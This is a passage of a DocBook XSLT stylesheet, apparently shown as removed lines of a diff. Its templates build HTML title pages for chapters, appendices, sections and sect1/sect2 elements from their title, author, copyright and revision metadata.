select="chapterinfo/corpauthor"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/corpauthor"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/authorgroup"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/authorgroup"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/author"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/author"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/othercredit"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/othercredit"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/releaseinfo"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/copyright"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/copyright"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/legalnotice"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/legalnotice"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/pubdate"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/pubdate"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/revision"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/revision"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/revhistory"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/revhistory"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/abstract"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/abstract"/> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="chapter.titlepage.verso"> -</xsl:template> - -<xsl:template name="chapter.titlepage.separator"> -</xsl:template> - -<xsl:template name="chapter.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="chapter.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="chapter.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="chapter.titlepage.before.recto"/> - <xsl:call-template name="chapter.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="chapter.titlepage.before.verso"/> - <xsl:call-template name="chapter.titlepage.verso"/> - </div> - <xsl:call-template name="chapter.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="chapter.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="chapter.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="chapter.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="chapter.titlepage.recto.style"> -<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="appendix.titlepage.recto"> - <xsl:choose> - <xsl:when test="appendixinfo/title"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/title"/> - </xsl:when> - <xsl:when test="docinfo/title"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="appendixinfo/subtitle"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/corpauthor"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/corpauthor"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/authorgroup"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/authorgroup"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/author"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/author"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/othercredit"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/othercredit"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/releaseinfo"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/copyright"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/copyright"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/legalnotice"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/legalnotice"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/pubdate"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/pubdate"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/revision"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/revision"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/revhistory"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/revhistory"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/abstract"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/abstract"/> - <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="appendix.titlepage.verso"> -</xsl:template> - -<xsl:template name="appendix.titlepage.separator"> -</xsl:template> - -<xsl:template name="appendix.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="appendix.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="appendix.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="appendix.titlepage.before.recto"/> - <xsl:call-template name="appendix.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="appendix.titlepage.before.verso"/> - <xsl:call-template name="appendix.titlepage.verso"/> - </div> - <xsl:call-template name="appendix.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="appendix.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="appendix.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="appendix.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="appendix.titlepage.recto.style"> -<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="section.titlepage.recto"> - <xsl:choose> - <xsl:when test="sectioninfo/title"> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="sectioninfo/subtitle"> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/corpauthor"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/authorgroup"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/author"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/othercredit"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/releaseinfo"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/copyright"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/legalnotice"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/pubdate"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/revision"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/revhistory"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/abstract"/> - <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="section.titlepage.verso"> -</xsl:template> - -<xsl:template name="section.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if> -</xsl:template> - -<xsl:template name="section.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="section.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="section.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="section.titlepage.before.recto"/> - <xsl:call-template name="section.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="section.titlepage.before.verso"/> - <xsl:call-template name="section.titlepage.verso"/> - </div> - <xsl:call-template name="section.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="section.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="section.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="section.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="section.titlepage.recto.style"> -<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="sect1.titlepage.recto"> - <xsl:choose> - <xsl:when test="sect1info/title"> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="sect1info/subtitle"> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/corpauthor"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/authorgroup"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/author"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/othercredit"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/releaseinfo"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/copyright"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/legalnotice"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/pubdate"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/revision"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/revhistory"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/abstract"/> - <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="sect1.titlepage.verso"> -</xsl:template> - -<xsl:template name="sect1.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if> -</xsl:template> - -<xsl:template name="sect1.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="sect1.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="sect1.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="sect1.titlepage.before.recto"/> - <xsl:call-template name="sect1.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="sect1.titlepage.before.verso"/> - <xsl:call-template name="sect1.titlepage.verso"/> - </div> - <xsl:call-template name="sect1.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="sect1.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="sect1.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="sect1.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect1.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="sect2.titlepage.recto"> - <xsl:choose> - <xsl:when test="sect2info/title"> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="sect2info/subtitle"> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/corpauthor"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/authorgroup"/> - <xsl:apply-templates 